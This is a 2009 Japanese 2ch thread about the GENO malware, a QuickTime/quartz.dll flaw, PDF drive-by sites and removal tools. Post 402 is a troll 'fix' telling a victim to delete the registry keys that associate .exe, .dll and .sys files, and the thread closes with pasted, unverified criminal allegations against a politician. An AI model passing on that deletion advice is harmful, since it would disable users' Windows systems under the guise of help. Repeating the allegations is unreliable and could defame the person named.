・・・素直にDirectShow用QTコーデックのバグって書いて欲しい。 そうすると、改変QTファイルをDirectShow利用プログラム経由でQT用フィルタ・スプリッタに通すと発症するって事になる。 で、DirectShow用QTコーデックのバグには>>363では触れられてない。 >>367 なので全く難しくなってません。 そもそもQTPlayerでは自前でデコードするだろうから、QTPlayerでQT開く時には元々発症しないんじゃないかな。 369 名前：192.168.0.774 mailto:sage [2009/06/05(金) 00:22:27 ID:wJ6nVbq00] 要するに、脆弱性の解決したQTプレイヤーの最新版を入れて それでQTファイルを開く分には問題ないってこと？ 370 名前：192.168.0.774 mailto:sage [2009/06/05(金) 00:53:14 ID:geb9McX00] 大昔、QuickTimeを、Windowsのメディアプレーヤで再生できた時期があったんだよ そのときの名残が、最近ではWindows同梱のquartz.dll ってのにあって、そこが問題になってる アンチAppleにはどっちにしたってむかつく話だろうが、とりあえずQuickTime更新しても、 MSが修繕して、アップデートしてくれるまでは、こっちは直らないわけだな 371 名前：192.168.0.774 mailto:sage [2009/06/05(金) 01:13:28 ID:SMLB9Vzg0] 誰が使ってるのかわからないような機能がいちばん危険だよな。 372 名前：192.168.0.774 mailto:sage [2009/06/05(金) 01:50:42 ID:geb9McX00] PDFもそう。確かに、分野によっては欠かせないものだが、それ以上に幅広く、 無駄にPCにプレインスコされて出荷され、そのまま死蔵になってる 回線がしっかりしてれば、いるときに落としてくればいいと思うんだけどな とはいっても、いざというときに目を通したことにしておいてくださいという 周辺機器の説明書がPDFだと、どうしてもリーダも同梱になっちまう 373 名前：192.168.0.774 mailto:sage [2009/06/05(金) 01:57:08 ID:VdpfbXko0] 大昔に入れたクイックタイムおるたなんとかが入れっぱなしになってるんだが 消したほうがいいのかな 374 名前：192.168.0.774 mailto:sage [2009/06/05(金) 02:00:01 ID:kF2EDitC0] >>372 んだんだ。 周辺機器のマニュアルの類はpdfであることが多いよな。 ルータも無線カードもMOも外付けHDDも複合機も、 更にメーカー製だとバンドルソフトのマニュアルまでもがpdfだったり。 375 名前：192.168.0.774 mailto:sage [2009/06/05(金) 02:45:18 ID:eYXhsJxW0] >>373 QuickTimeムービーを再生することがないなら消せばいい。 再生することがあるなら最新版に更新しておけ。 376 名前：192.168.0.774 mailto:sage [2009/06/05(金) 03:00:29 ID:6SIDmEC50] ある程度の普及率を持つソフトウェアは全て ・最新バージョンチェック機能つきインストーラ 　 →CDに同梱する場合等、オフライン環境にもインストールが可能であり、オンライン環境ならば最新版をインストールできるのが望ましい ・実装上再セットアップであってもそれを意識させないオンラインアップデート機能 　 →インストーラのダウンロードまでしか面倒を見ない物だと、入れるのが億劫になって無視しがち ・明確なスケジュール・トリガのあるアップデートチェック機能 　 →いくら修正しても、アップデート通知が出なかったりしたら意味ないですよ、Adobeさん、Symantecさん。 を持っていてくれないと危なっかしくてしようが無い ・・・と思う。 コーデックみたいなプラグイン系はちょっと難しい所があるのが難だが・・・ 起動時にアップデータをRunOnceに放り込むとかで常駐無しに安全性を確保することも不可能じゃないのにな。 377 名前：192.168.0.774 mailto:sage [2009/06/05(金) 03:32:03 ID:geb9McX00] アップデートするモチベがない アップデートすると、重くなる(かも？って勝手な予想するのも含む)となると、余計アップデートしない せめて、オフライン版は、ブラウザにプラグイン入れない。とか。ｗ 腐ったファイルをメールに添付して踏ませるのには無効だが、ブラウザ経由でってのは減らせそう 378 名前：192.168.0.774 mailto:sage [2009/06/05(金) 09:19:48 ID:jt2tl6gS0] wmv呼び出すようにwebに貼り付けて、細工したqt再生するようにしておけばイケるのか まぁ、Win7への移行が進めばASLRが効くから、この手の問題はおおよそ解決するんじゃないかな あとは、携帯みたいに、機種毎に微妙に仕様違っていて、影響範囲が限定的になるとか。 そうやって考えると、数年前にASLR実装して、マイナー違いだらけのLinuxってすげぇよなとか思ったり。 379 名前：192.168.0.774 mailto:sage [2009/06/05(金) 11:02:29 ID:9oazRdMR0] >>370 quartz.dll の役割を今初めて知ったよ WM機にもそのファイルあるんだけどさ 380 名前：192.168.0.774 mailto:sage [2009/06/05(金) 15:20:40 ID:geb9McX00] >>379 quartz.dll が、そのQuickTime(それも旧形式)だけをみてるんなら、あぼんすればおしまいなんだけど、 他にもいろいろ基盤的な処理をしてるDLLなので、一概にそうもできないわけね IEとかと同様、どうしてもバグフリーにできない複雑なコンポーネントだから、ビジネス用途の端末とか、 動画とか一切いらないPCなら、あぼんしとけばいいかも 実際にそういう攻撃遮断策も紹介されてる だいたい、そうゆうもん 381 名前：192.168.0.774 mailto:sage [2009/06/05(金) 16:41:00 ID:5sVAYN+A0] >>376 あとは ADM とか配布して組織内で集中管理出来るようにしてほしいね。 382 名前：192.168.0.774 mailto:sage [2009/06/06(土) 14:59:57 ID:izh1au960] これってどうなの？ ttp://www.mcafee.com/Japan/mcafee/support/announcement20090527.asp 383 名前：192.168.0.774 mailto:sage [2009/06/06(土) 16:42:22 ID:Xz0CFMXE0] これからもGENOと似たようなウイルスが普通に蔓延する模様 「Baladen」による大規模サイト改ざん、コード難読化で検知回避 internet.watch.impress.co.jp/cda/news/2009/06/03/23670.html 384 名前：192.168.0.774 mailto:sage [2009/06/06(土) 17:41:02 ID:lqce6X1B0] >>382 ちょっと見ないうちに、こんなに便利になってたのか。あとでみてみる 385 名前：192.168.0.774 mailto:sage [2009/06/06(土) 19:10:19 ID:lqce6X1B0] 落としてみた。これは便利かもしれん sysinternal好きなら気に入るとおもわれ 386 名前：192.168.0.774 mailto:sage [2009/06/07(日) 02:02:38 ID:M7AHivT40] sysinternal好きならっていうか、sysinternalそのものだよな 387 名前：192.168.0.774 mailto:sage [2009/06/07(日) 07:34:05 ID:RGnVDoX80] sysinternal好きなら、sysinternalでなんとなーくそろえるでそｗ そゆ意味 388 名前：192.168.0.774 mailto:sage [2009/06/07(日) 09:50:33 ID:2PGpvmxT0] >>382,>>385-386 使ってみた。結果は Possibly Infected: ....0。 sysinternalのことは浅学非才の身なので知らない。 389 名前：192.168.0.774 mailto:sage [2009/06/07(日) 14:48:04 ID:1hLnbE2g0] >>388 sysinterna社ってのが以前存在してWindowsの管理用ツールを販売、一部無料公開してた それをMicrosoｆtが買収して、元sysinternalのフリーダウンロードページがMicrosoftの一コンテンツとなってる アップデートもされてるっぽいからとりあえず全部おとしてURLをBMしとくといいよ 390 名前：388 mailto:sage [2009/06/07(日) 17:11:33 ID:2PGpvmxT0] >>389 ご親切なレスに感謝！ おかげさまで、すぐたどり着けました。 Sysinternals ホーム ttp://technet.microsoft.com/ja-jp/sysinternals/default.aspx Sysinternals ダウンロード ttp://technet.microsoft.com/ja-jp/sysinternals/bb545027.aspx とても参考になります。ありがとうございます。 391 名前：192.168.0.774 mailto:sage [2009/06/10(水) 02:51:41 ID:F4oni6Pd0] 類似動作の新型の情報がようやく出はじめましたね。 どこの方かは存じませんが、解説している人、乙であります。 ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=cn%A5%C9%A5%E1%A5%A4%A5%F3%A4%F2%CD%F8%CD%D1%A4%B7%A4%BF+cocacola+%2C+income+%2Cpepsi+%A5%A4%A5%F3%A5%B8%A5%A7%A5%AF%A5%B7%A5%E7%A5%F3 392 名前：192.168.0.774 mailto:sage [2009/06/10(水) 21:05:59 ID:/rWKXzaA0] 今回のreader（9.1.1）更新も >adobe readerを開いて　ヘルプ→アップデートの有無をチェック でおｋスか？ 393 名前：192.168.0.774 mailto:sage [2009/06/10(水) 21:13:50 ID:/rWKXzaA0] ↑すんません、アップデートしました。 394 名前：192.168.0.774 mailto:sage [2009/06/11(木) 01:28:02 ID:Imp2Uwco0] >>392-393 おｋ。そして、9.1.2への更新な。 395 名前：192.168.0.774 mailto:sage [2009/06/11(木) 17:18:29 ID:uOndiU0l0] adobe readerが9.1.2になった 396 名前：192.168.0.774 mailto:sage [2009/06/11(木) 21:49:28 ID:jMVQpTl20] >>395 チラシの裏に書いてろクズ 397 名前：192.168.0.774 mailto:sage [2009/06/11(木) 23:04:12 ID:9O3T7NN/0] >>396 www.youtube.com/watch?v=XfBOcCWXftc 398 名前：192.168.0.774 mailto:sage [2009/06/12(金) 01:00:05 ID:qtX3J3f5O] 何これ？ 399 名前：192.168.0.774 mailto:sage [2009/06/13(土) 00:10:50 ID:7Q2x+i690] GENOウイルスのサイト改ざん被害、国内で400件以上確認される internet.watch.impress.co.jp/cda/news/2009/06/12/23779.html 400 名前：192.168.0.774 [2009/06/13(土) 10:17:18 ID:t6zoMOJ60] これは酷い 401 名前：192.168.0.774 mailto:sage [2009/06/13(土) 22:22:05 ID:3M+6Njb90] １．regeditが直接起動しないので、ファイル名指定でcommandを実行、ＤＯＳ窓を出す。 ２．ＤＯＳ窓からregeditを起動。 ３．下記レジストリデータを確認。あれば感染している 　　HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux? ４．キー指定のファイル名をC:\WINDOWS\から削除 ５．正常なsqlsodbc.chmファイル（サイズ50727byte）をC:\WINDOWS\system32\に上書きコピー ６．先程のレジストリデータを削除。 ７．下記のキーが無いことも確認する。 　　HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation ８．再起動 このもっと詳細なやり方教えて下さい。 402 名前：192.168.0.774 mailto:sage [2009/06/13(土) 22:27:03 ID:yW44nLjk0] >>401 そんなことしなくても レジストリエディタを開いて、以下のキーを全て削除して、再起動でおｋ HKEY_LOCAL_MACHINE\Software\CLASSES\.dll HKEY_LOCAL_MACHINE\Software\CLASSES\.exe HKEY_LOCAL_MACHINE\Software\CLASSES\.sys HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile HKEY_LOCAL_MACHINE\Software\CLASSES\exefile HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile 403 名前：192.168.0.774 mailto:sage [2009/06/13(土) 22:50:21 ID:olk3r39Z0] >>401 人に質問しながらでないとできないなら復旧はまず不可能。 素人に簡単に駆除できるようならこんなに問題にはならんからな。 黙って再インストールしてくれ。 404 名前：192.168.0.774 mailto:sage [2009/06/13(土) 22:57:34 ID:ARaQrfiq0] >>401 >>382 405 名前：192.168.0.774 mailto:sage [2009/06/14(日) 00:59:16 ID:C/M8+vVy0] このスレは、初心者サポート期間は終了しましたので 406 名前：192.168.0.774 [2009/06/14(日) 19:12:44 ID:EPArmPcM0] １．regeditが直接起動しないので、ファイル名指定でcommandを実行、ＤＯＳ窓を出す。 ２．ＤＯＳ窓からregeditを起動。 ３．下記レジストリデータを確認。あれば感染している 　　HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux? ４．キー指定のファイル名をC:\WINDOWS\から削除 ５．正常なsqlsodbc.chmファイル（サイズ50727byte）をC:\WINDOWS\system32\に上書きコピー ６．先程のレジストリデータを削除。 ７．下記のキーが無いことも確認する。 　　HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation ８．再起 ５の 正常なsqlsodbc.chmファイル（サイズ50727byte）をC:\WINDOWS\system32\に上書きコピー の詳しいやり方おしえて 407 名前：192.168.0.774 mailto:sage [2009/06/14(日) 20:02:46 ID:/NaUDULu0] しつこいな 408 名前：192.168.0.774 mailto:sage [2009/06/14(日) 20:12:05 ID:EsGyl6A+0] >>406 クリーンインストール 409 名前：192.168.0.774 mailto:sage [2009/06/14(日) 20:12:49 ID:o1wDCDqN0] エロサイト見た後でブラウザ閉じたら、いつの間にか別にウィンドウが開いていて こんな不明なサイトが見つかりますた わたすは大金持ちになったのですかそうですか www.freelotto.com/register.asp?skin=Cert&noepu=1&partner=1060373&affiliateid= 410 名前：192.168.0.774 mailto:sage [2009/06/14(日) 20:54:11 ID:EsGyl6A+0] で、それがGENOと何の関係が？ 411 名前：192.168.0.774 mailto:sage [2009/06/14(日) 23:01:31 ID:9CFoS/uv0] スレないにGENOウイルス駆除ツールに関するリンクが貼られているというのに>>406は何なんだ？ 412 名前：192.168.0.774 mailto:sage [2009/06/15(月) 09:33:14 ID:KVqrUa+P0] だからもう、助けてクレクレは、【いぢったりしないで】スルーしようぜ 外付けブートできるヤツくらい、リアルにひとりやふたりいるだろ 今回は同梱されてなかったが、ルートキットくらい、自分で始末しろ。 いまこのスレは、そういうレベルに戻ってる 面倒見のいいヤツは流出したんだ。あいつらは流動してる。(それでいいけど) そして、周辺に大規模感染があれば、またふらりと戻ってくる 413 名前：192.168.0.774 mailto:sage [2009/06/15(月) 20:47:44 ID:t5CdTQZr0] パソコン一台でも普段はウイルス対策をしっかりやったwindows ネットサーフィンのときはLinux系を使えばGENOと同じ感染プロセスのウイルスは防げるのかな？ 414 名前：192.168.0.774 mailto:sage [2009/06/15(月) 20:53:55 ID:KVqrUa+P0] インターネッツライフをLinux系で賄えるなら、いまんとこかなりの脅威は回避できる Macですらかなり間に合うのに、Linuxならしばらく安泰 お約束で触れておくなら、ソーシャルハック系(騙されて垢を奪われる)はLinuxだろうと防げない 死角はゼロにならないので、露出狂にならんようにｗ 415 名前：192.168.0.774 mailto:sage [2009/06/15(月) 23:30:35 ID:HQGGj4ptP] 終息した？ 416 名前：192.168.0.774 mailto:sage [2009/06/15(月) 23:44:36 ID:8i7xfZWb0] >>415 氏ね 能無し 417 名前：192.168.0.774 mailto:sage [2009/06/16(火) 08:40:55 ID:x4DnqVnv0] 何突然興奮してるんだろ 418 名前：192.168.0.774 mailto:sage [2009/06/16(火) 13:58:05 ID:IgQj6kkj0] 潜伏期間が過ぎて発症したんだろ。 419 名前：192.168.0.774 mailto:sage [2009/06/17(水) 09:49:16 ID:mVglo+DJ0] 「PDF」ウイルス、アダルトサイトに仕掛けられる――G Data が報告 (インターネットコム) ttp://news.www.infoseek.co.jp/topics/comp/n_virus__20090617_4/story/20090615internetcomwe01/ これって関係ある？ 420 名前：192.168.0.774 mailto:sage [2009/06/17(水) 10:24:46 ID:JPvfv0Nw0] 似てれば似てると書くと思うんだよな 日頃のこつこつとした対策が重要なのは共通。 このまま、随所のGENO系ウイルススレは、大規模webウイルススレになっていくのかな ちなみに、GENOと名がついていて、GENO(店舗)のことを扱ってるのは除くと、主なところで ・ここ ・同人板 ・セキュ板 ・女向ゲー一般板 ・パソコン一般板 ・同人ゲーム板 ・ネットwatch板 にスレがある様子(find.2ch.net検出順)。 421 名前：192.168.0.774 mailto:sage [2009/06/17(水) 11:22:35 ID:wFOzdNIP0] ■ おすすめ２ちゃんねる 開発中。。。 by FOX ★ このスレを見ている人はこんなスレも見ています。(ver 0.20) GENOウイルススレ　★21 [セキュリティ] 乙女＆BL＠【公式感染】GENOｳｲﾙｽ注意喚起ｽﾚ2 [女向ゲー一般] 【報告専用】同人サイト向け・GENOウィルス注意11 [同人] 【明光○塾】女子中学生の生徒と淫行三昧★178【講師たかゆき】 [ニュース議論] 【明光○塾】女子中学生の生徒と淫行三昧★177【講師たかゆき】 [ニュース議論] 422 名前：192.168.0.774 [2009/06/17(水) 16:25:35 ID:6ER87SJA0] GENOより強力な新型が出現したみたいだけど これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの？ ↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　 〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓 japan.cnet.com/news/sec/story/0,2000056024,20395086,00.htm ＜抜粋＞これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。 実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、 通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には ウイルスをロードしてしまう。 423 名前：192.168.0.774 mailto:sage [2009/06/17(水) 23:17:23 ID:cNPieBDU0] 悩むくらいならReaderごとアンインスコしたほうがいい 424 名前：192.168.0.774 mailto:sage [2009/06/18(木) 12:57:44 ID:oSNBi7b+0] 今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ（米セキュリティ企業公表） www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075 425 名前：192.168.0.774 [2009/06/19(金) 12:42:57 ID:1dktemNX0] “けん"を変換すると“ロン"が出るんだけど、これって何かある？ 代わりに“ケン"が出ない (一文字ずつなら出せるけど) GENOはこのまえ症状がそっくりでリカバリしたけど、セキュリティは前のままなんで 426 名前：192.168.0.774 mailto:sage [2009/06/19(金) 13:31:32 ID:PsMl7UOK0] そういうの、あるよ。 GENOが流行るずっと前から、特定の単語を打ち込むと、 全然関係ない単語に変換されちゃうの。 気持ち悪いけど、人に言う分には面白いし直し方分からんから放置してる。 427 名前：192.168.0.774 mailto:sage [2009/06/19(金) 14:04:26 ID:l7tIMz7M0] >>425 前のままじゃダメだと自覚があるならそこを直せばいいのに 428 名前：192.168.0.774 [2009/06/19(金) 17:13:02 ID:1dktemNX0] じゃあマザーボードがおかしいのかもしれんな >>427 やっぱねウィルスソフトもねアホらしいしね、1年くらいなら最新入れんでも大丈夫な気がするじゃん 去年の11月に更新終了して、今年の終わりにノートン2010だっけ？出たら買おうかと思ってる 429 名前：192.168.0.774 mailto:sage [2009/06/19(金) 22:01:56 ID:l7tIMz7M0] なんだ釣りだったのか 430 名前：192.168.0.774 mailto:sage [2009/06/19(金) 22:24:10 ID:EWSkSKSu0] ＞ウィルスソフト この時点で釣り決定 431 名前：192.168.0.774 [2009/06/22(月) 13:12:26 ID:OFcMMviC0] GENOウイルススレ　★22 pc11.2ch.net/test/read.cgi/sec/1245640557/ 432 名前：192.168.0.774 mailto:sage [2009/06/22(月) 13:13:45 ID:Qff0AEDv0] アフィは許せる(スルーするだけだ)が、こんなにそこいら中に次スレはいらんぞｗ 消化していこうぜ 433 名前：192.168.0.774 mailto:sage [2009/06/22(月) 13:17:35 ID:UL1vSPoA0] めいめいすきなところに移動汁 434 名前：192.168.0.774 mailto:sage [2009/06/22(月) 13:20:15 ID:UL1vSPoA0] 途中送信してしまった セキュ板994の人が「めいめいすきなところに移動汁」 つってんだから好きなところに書き込めばいいんじゃね 435 名前：192.168.0.774 mailto:sage [2009/06/22(月) 21:51:07 ID:zjMZOGeY0] いらないって言われてるのに立てるとか… 436 名前：192.168.0.774 mailto:sage [2009/06/22(月) 22:00:03 ID:n9xFzxJy0] 誰も書き込まなければそのうち落ちるんじゃね 初質板の鑑定スレみたいに双方がアラシ呼ばわりする事態だけは避けてほしいが 437 名前：192.168.0.774 mailto:sage [2009/06/22(月) 22:48:53 ID:WFTQ6v550] そういえばあったな。向こうはIDでないとかで 438 名前：192.168.0.774 mailto:sage [2009/06/22(月) 23:05:58 ID:n9xFzxJy0] まぁ、ここの人たちはIDなくても見分けつく人が多いから大丈夫だと思うけどね 対立を演出したいやつにウイルスコード貼られてもスルーしてるし 439 名前：192.168.0.774 mailto:sage [2009/06/23(火) 04:14:43 ID:aGFOinC00] 真するできないねえ 440 名前：192.168.0.774 mailto:sage [2009/06/23(火) 06:22:28 ID:etrZRzT30] └（ﾟ∀ﾟ└)真する!真する!!（┘ﾟ∀ﾟ）┘ 真する!真する!! (：D)|￣|＿ 441 名前：192.168.0.774 mailto:sage [2009/06/23(火) 06:28:16 ID:87zUBhtd0] わけのわからないAA貼り付けてごまかそうとしても無駄だよ！！！！ もう一度確認しておこう。 テクノの元祖はスナインコッコスマナラコッサーラ長老。 442 名前：192.168.0.774 mailto:sage [2009/06/23(火) 06:31:32 ID:etrZRzT30] (´;ω;`)　　(´;ω;:;.:...　　(´;:;.:.:;.:...　　.:.:;.:...... 443 名前：192.168.0.774 mailto:sage [2009/06/24(水) 11:19:53 ID:thH4Vr8L0] >>432 ＞アフィは許せる(スルーするだけだ) もともとGENOチェッカーの精度が問題だって話だったのに いつのまにアフィが焦点になったんだって希ガス O ｏ｡(´Α｀) 444 名前：192.168.0.774 mailto:sage [2009/06/24(水) 21:30:38 ID:qVqYmhkg0] テンプレ勝手に変えるから 445 名前：192.168.0.774 mailto:sage [2009/06/24(水) 22:44:50 ID:kaNkJ5AZ0 BE:530136544-2BP(0)] >>443 ともあれ手を動かすって考えには賛同してる 失敗を恐れるのが普通だし、これがなかなかできない やるなら、精度向上を続けるとか、停止するその日まで(削除ではなく、跡地にすればいいと思う)、 サポートを続けないととは思うけどね 446 名前：192.168.0.774 mailto:sage [2009/06/24(水) 22:46:48 ID:kaNkJ5AZ0] …ただし、一般論として、人の不幸を、直接小銭の種にしようってのは、 受け入れられるか否か、文化によるかなと 447 名前：192.168.0.774 mailto:sage [2009/06/24(水) 22:59:37 ID:qVqYmhkg0] あのサイトそのものにはべつになんのアレも無い。スキにすればいい テンプレ勝手に変えてwikiなんかのリンク外ス奴がでなきゃね ＞wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。 本人じゃないでしょさすがに 448 名前：192.168.0.774 mailto:sage [2009/06/24(水) 23:15:52 ID:eGt3q4yV0] ＞信憑性に欠き ひどい日本語だ 449 名前：192.168.0.774 mailto:sage [2009/06/25(木) 03:35:49 ID:8ZyQJlBp0 BE:397602162-2BP(0)] うまく言えないな、、 直接小銭の種にしようとしてるかはわからないし、 直接小銭の種にしようとしてるとみなされるかどうかもわからない。 このまま、日本がターゲットに選ばれなければいいなと。なんとなく。 450 名前：192.168.0.774 mailto:sage [2009/06/25(木) 21:45:01 ID:N/dc4Nk50] ……。 451 名前：192.168.0.774 mailto:sage [2009/06/25(木) 21:58:12 ID:CiB5GY6i0] 406 名前： ◆XcxlmnqGqU [sage] 投稿日：2009/05/30(土) 19:57:35 >>403 全く安全 多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、 javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません よってその対処法を導入していれば持続的な被害に合うことは一切ありません >>404 雑魚は黙ってなさい 495 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/31(日) 17:31:04 幸せサーバープロジェクト　「アイデア・技術のある人募集中」★3 qb5.2ch.net/test/read.cgi/operate/1241361889/ XcxlmnqGqU 192-319 424 499 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/31(日) 18:10:08 運営スレであんだけファビョって インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて 今度は何をしてくれるのかな 646 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/06/04(木) 16:25:44 ★同人新スレにアフィが追加されました！ 【報告専用】同人サイト向け・GENOウィルス注意11 changi.2ch.net/test/read.cgi/doujin/1244096936/ 452 名前：192.168.0.774 mailto:sage [2009/06/25(木) 22:29:39 ID:u/8UXvhn0] >>451 一個目、何度見てもジワジワくる 453 名前：192.168.0.774 mailto:sage [2009/06/26(金) 03:04:11 ID:wSR8F7l40] 皮肉屋ですね（笑） 454 名前：192.168.0.774 mailto:sage [2009/06/26(金) 03:05:03 ID:5xv1P6lY0] >>451の話はJavaのところが問題なのにな 455 名前：192.168.0.774 mailto:sage [2009/06/26(金) 04:21:57 ID:wSR8F7l40] そ、そうですね A＾-＾；) 456 名前：192.168.0.774 mailto:sage [2009/07/02(木) 00:36:56 ID:lL97EwEVP] このウイルス思ったけど被害がなかったようだね おまえらに釣られて騒ぎすぎたぜ 457 名前：192.168.0.774 mailto:sage [2009/07/02(木) 14:11:39 ID:dPCiJwkr0] >>456 騒いだからサイト閉じられて被害が少なかったとは思えんのか？ 458 名前：192.168.0.774 mailto:sage [2009/07/02(木) 16:08:14 ID:XV4YJu590] 被害あったってゾンビになっちゃったかもしれないやつらは気づいてないだろ 459 名前：192.168.0.774 mailto:sage [2009/07/02(木) 19:55:54 ID:DAKHPjSE0] それに感染に気付いていても、サイト持ちじゃないから実害ないし このままでもいいよね的なカキコをしてた奴が複数いた事を考えると 自覚していながら放置組も相当いるかも知れない。 そしてそれらPCがボットネットに組み込まれているであろう事を思えば。。。 後で「実は抜かれてるのは個人情報もでした」となったら阿鼻叫喚かもな。 460 名前：192.168.0.774 mailto:sage [2009/07/02(木) 20:03:21 ID:hEHmcCZ90] データ破壊系ではないウイルスなら個人情報を抜かれるかも と考えると思うんだが、実害ないしいいやと思えるのがわからん 461 名前：192.168.0.774 mailto:sage [2009/07/02(木) 21:10:06 ID:rR8NeVNy0] そんなやついんの 462 名前：192.168.0.774 mailto:sage [2009/07/02(木) 21:52:57 ID:HR77S6HE0] いるよ。「WinPCでネットやってりゃ多少なりともウイルス飼ってるのが普通」 ぐらいのこと、平気で言うやついるし 463 名前：192.168.0.774 mailto:sage [2009/07/02(木) 22:37:03 ID:1AbxG1a50] ＧＥＮＯ全盛期に 「ネットで買い物しないしＰＣメールしないし個人情報無いから別に感染してもいいや」て言われた 464 名前：192.168.0.774 mailto:sage [2009/07/02(木) 23:42:59 ID:rR8NeVNy0] クッキーごときを検出しまくったへいがい 465 名前：192.168.0.774 mailto:sage [2009/07/03(金) 03:56:49 ID:EjGCdy4A0] >>462-463 いたね、そういう人。言われた人はホントお気の毒だった ネットやっててウイルスに感染する覚悟を持つことと ウイルス貯蔵庫兼配給部隊になることとは別問題のはずなのに 前に女向ゲー一般GENOスレで見たネット版「腸チフスのメアリー」 そんな人がゴロゴロしてるんだろうな 466 名前：192.168.0.774 mailto:sage [2009/07/03(金) 08:24:53 ID:TmNzMHZD0] 本人にその意思がなくても、第三者に電子計算機を利用され、 他者の電子計算機器等に障害を発生もしくは破壊行為を行った場合、 ○○万円以下の罰金もしくは懲役○○年に処す くらいの法律がないと、「俺は悪くない」で済んじゃうからな。 現段階では、プロパイダが責任を持って通信遮断を行うことになってるんだっけ？ 467 名前：192.168.0.774 mailto:sage [2009/07/03(金) 09:45:50 ID:F0OTa+om0] いづれパソコンも免許がいるようになる バカはパソコンを使えない時代が来るってこったｗ 468 名前：192.168.0.774 mailto:sage [2009/07/03(金) 18:22:00 ID:EjGCdy4A0] >>466 internet.watch.impress.co.jp/cda/news/2007/05/31/15889.html 愚痴らし なんか無茶鰤がすぎるんですけど 469 名前：192.168.0.774 mailto:sage [2009/07/03(金) 21:16:59 ID:mm3IBTQg0] たしかに、そういうこと熟知してる者のレスに見えるな そういや前スレでも法に精通した香具師がいたが、お仲間か 470 名前：192.168.0.774 mailto:sage [2009/07/04(土) 15:39:06 ID:eC8cizyU0] ムチャ振り(・A ・)ｲｸﾅｲ! せめて釣り氏さんみたいに誘い受けにとどめれ と言いたいところだが、>>466のは普通に質問 なんでもかんでも自分へのレスだと思い込むのは 2ch初心者がよく陥る罠。それを諫めるために有名な 「2chにはひろゆきと俺とお前だけ」のコピペがある 471 名前：192.168.0.774 mailto:sage [2009/07/04(土) 16:20:10 ID:tMN9XWSy0] てか実際、2chにはつーかネットの中には オレとオマエとひろゆきだけ 472 名前：192.168.0.774 mailto:sage [2009/07/04(土) 17:33:15 ID:mOYjbOaL0] 全部俺の自演 473 名前：192.168.0.774 mailto:sage [2009/07/04(土) 18:41:54 ID:eC8cizyU0] ぶっちゃけ世界には、おれとおまえと ひろゆきだけ。後は全部おれのスタンド 474 名前：192.168.0.774 mailto:sage [2009/07/04(土) 19:23:52 ID:tMN9XWSy0] ひろゆきさんはどこまでもついてくるんですね（笑） 475 名前：192.168.0.774 mailto:sage [2009/07/04(土) 19:27:53 ID:eC8cizyU0] そりゃオマ、ひろゆきは… おや？こんな時間に誰か来たようだ 476 名前：192.168.0.774 mailto:sage [2009/07/04(土) 20:58:27 ID:VfNAT2grP] 477 名前：192.168.0.774 mailto:sage [2009/07/07(火) 10:31:14 ID:O20iNlf+0] 関連: ばりゅどめたんに埋め込みスクリプトあらわる ばりゅどめ側は駆除済みだが、顛末が読める 攻撃鯖は生存中 検体ｸﾚｸﾚたん(俺含む)は急げ VALUE DOMAINってどうよ？ part33 pc11.2ch.net/test/read.cgi/hosting/1246828727/ 478 名前：192.168.0.774 mailto:sage [2009/07/10(金) 00:24:44 ID:aAq3fgTNO] genoに感染しました。 aから始まるウィルスチェッカーだと駆除できるというのをみて、インストールしたら、 うっかり再起動してしまい、ブルースクリーンで動かなくなってしまいました。 どうすればよいのでしょうか 479 名前：192.168.0.774 mailto:sage [2009/07/10(金) 00:51:58 ID:uLP/X9D10] それ本当にGenoなの？ とりあえずOSいれなおせばいいよ 480 名前：478 mailto:sage [2009/07/10(金) 00:58:39 ID:aAq3fgTNO] まとめにかいてあるのは試しました。コマンドプロテクトのです。 今一人暮らしをしていて、実家にosのCDｒおいてます。 もし買うとしたらいくらぐらいですか？ 481 名前：192.168.0.774 mailto:sage [2009/07/10(金) 01:05:02 ID:wORF7xaw0] WindowsXP Home SP3 \11,820 1's 482 名前：192.168.0.774 mailto:sage [2009/07/10(金) 01:42:39 ID:35zxjN7l0] 26 名前： シラネアオイ(アラバマ州)[sage] 投稿日：2009/07/09(木) 21:25:01.62 ID:9KONbv8B エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5 1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決（執行猶予） 1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた 1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令 2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う nagamochi.info/src/up21093.jpg　　 nagamochi.info/src/up21094.jpg 宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん！ 道路があれば介護も福祉もいらんとです！ 道路さえあれば年金問題も解決するとです！ 